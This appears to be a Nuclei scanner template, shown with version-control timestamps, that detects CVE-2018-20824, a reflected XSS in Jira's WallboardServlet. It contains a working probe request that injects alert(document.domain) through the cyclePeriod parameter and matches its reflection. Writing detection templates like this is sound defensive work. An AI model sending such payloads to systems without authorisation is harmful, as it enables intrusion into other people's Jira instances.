2021-01-02 05:00:39 +00:00
id : CVE-2018-20824
2020-06-22 13:35:37 +00:00
info :
name : Atlassian Jira WallboardServlet XSS
2021-06-09 12:20:56 +00:00
author : madrobot,dwisiswant0
2020-06-22 13:35:37 +00:00
severity : medium
2020-08-25 22:22:08 +00:00
description : The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://jira.atlassian.com/browse/JRASERVER-69238
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20824
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,atlassian,jira,xss
2020-06-22 13:35:37 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-06-22 13:35:37 +00:00
matchers :
- type : status
status :
2020-06-22 21:51:54 +00:00
- 200
2020-07-08 20:45:08 +00:00
- type : regex
regex :
- (?mi)timeout:\salert\(document\.domain\)
2020-06-22 13:35:37 +00:00
part : body